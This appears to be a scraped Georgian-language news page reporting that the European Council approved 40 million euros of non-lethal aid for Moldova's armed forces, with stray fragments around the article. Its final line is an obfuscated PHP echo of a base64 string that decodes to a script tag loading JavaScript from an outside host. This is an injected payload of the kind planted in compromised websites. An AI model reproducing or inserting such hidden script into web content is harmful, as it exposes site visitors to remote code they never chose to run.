celsiusi
ავერსი შნაიდერი
ევროპულმა საბჭომ მოლდოვის შეიარაღებული ძალებისთვის 40 მილიონი ევროს ოდენობის დახმარება დაამტკიცა.
 
როგორც საბჭოს განცხადებაშია აღნიშნული, დახმარება გააძლიერებს მოლდოვის შეიარაღებული ძალების ლოჯისტიკის, მობილობის, მეთაურობის და მართვის, კიბერთავდაცვის, უპილოტო საჰაერო დაზვერვისა და ტაქტიკური კომუნიკაციის შესაძლებლობებს. ამისთვის მოლდოვა მიიღებს არალეტალურ აღჭურვილობას, მასალებს და მომსახურებას, მათ შორის აღჭურვილობასთან დაკავშირებულ სწავლებას.
 
2021 წლის დეკემბერში ევროკავშირმა მოლდოვის სამხედრო სამედიცინო სამსახურისა და შეიარაღებული ძალების საინჟინრო ბატალიონის შესაძლებლობების გაძლიერებისთვის 7 მილიონი ევროს ოდენობის დახმარება დაამტკიცა.
499
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");